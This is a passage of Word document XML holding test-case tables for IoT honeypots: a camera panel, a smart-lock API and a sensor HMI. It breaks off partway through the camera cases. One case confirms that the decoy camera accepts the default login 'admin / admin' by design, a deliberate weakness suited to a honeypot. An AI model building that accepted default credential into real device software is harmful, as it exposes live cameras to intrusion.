              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">OK temp_threshold=21; Redis device:sensor temp_threshold = 21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9039" w:name="_Toc69039"/>
      <w:r>
        <w:t xml:space="preserve">HTTP Honeypots (CCTV Camera, Smart Lock API, Sensor HMI)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9039"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the HTTP honeypots: the camera panel (8080), the smart-lock REST API (8081) and the sensor HMI (8082).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for the HTTP Honeypots</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Actual Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-HTTP-001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the camera login page loads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running; port 8080 open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Login form with model and firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200; Network Camera login form rendered</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-HTTP-002</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify a default credential opens the live view</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">admin / admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">302 to /live and live view</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">302 → /live; HTTP 200 live view with 4 channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-HTTP-003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Honeypot (CCTV Camera)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify wrong credentials show the vendor error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack running</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
